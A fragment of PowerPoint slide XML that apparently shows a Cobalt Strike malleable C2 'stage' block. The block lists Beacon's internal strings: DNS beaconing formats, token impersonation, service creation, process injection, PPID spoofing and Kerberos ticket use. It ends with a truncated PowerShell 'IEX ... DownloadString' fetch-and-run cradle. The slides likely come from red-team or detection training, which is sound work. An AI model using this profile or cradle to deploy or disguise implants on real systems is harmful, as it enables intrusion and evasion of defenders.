              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stage {</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stomppe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "false";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	set name    "beacon.dll";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d.%s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"post";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cdn</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x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "www6.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x.%x%x.%s";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api</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x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "unknown";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not run command (w/ token) because of its length of %d bytes!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not spawn %s (token): %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not spawn %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open process token: %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not run %s as %s\\%s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "COMSPEC";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string " /C ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not upload file: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not open %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not get file time: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not set file time: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "127.0.0.1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not connect to pipe (%s): %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open service control manager on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not create service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not start service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Started service %s on %s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not query service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not delete service %s on %s: %d";</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SeDebugPrivilege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SeTcbPrivilege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SeCreateTokenPrivilege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SeAssignPrimaryTokenPrivilege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SeLockMemoryPrivilege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SeIncreaseQuotaPrivilege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SeUnsolicitedInputPrivilege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SeMachineAccountPrivilege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SeSecurityPrivilege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SeTakeOwnershipPrivilege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SeLoadDriverPrivilege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SeSystemProfilePrivilege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SeSystemtimePrivilege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SeProfileSingleProcessPrivilege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SeIncreaseBasePriorityPrivilege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SeCreatePagefilePrivilege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SeCreatePermanentPrivilege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SeBackupPrivilege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SeRestorePrivilege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SeShutdownPrivilege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SeAuditPrivilege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SeSystemEnvironmentPrivilege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SeChangeNotifyPrivilege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SeRemoteShutdownPrivilege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SeUndockPrivilege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SeSyncAgentPrivilege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SeEnableDelegationPrivilege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SeManageVolumePrivilege</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create service: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not start service: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate token: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to get token";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IsWow64Process";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "kernel32";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open '%s'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s\\%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "copy failed: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "move failed: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "D	0	%02d/%02d/%02d %02d:%02d:%02d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Wow64DisableWow64FsRedirection";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Wow64RevertWow64FsRedirection";</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ppid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %d is in a different desktop session (spawned jobs may fail). Use '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ppid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' to reset.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not allocate %d bytes in process: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not write to process memory: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not adjust permissions in process: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not create remote thread in %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not open process %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d is an x64 process (can't inject x86 content)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d is an x86 process (can't inject x64 content)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "syswow64";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "system32";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not set PPID to %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not set PPID to %d";</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ntdll</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NtQueueApcThread</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ld</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string "%.2X";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%.2X:";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "process";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not connect to pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d	%d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Kerberos";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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket purge failed: %08x";</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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket use failed: %08x";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not connect to pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not connect to pipe";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Maximum links reached. Disconnect one";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d	%d	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d.%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%s	%s	%s	%d	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not bind to %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.Webclient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DownloadString</a:t>
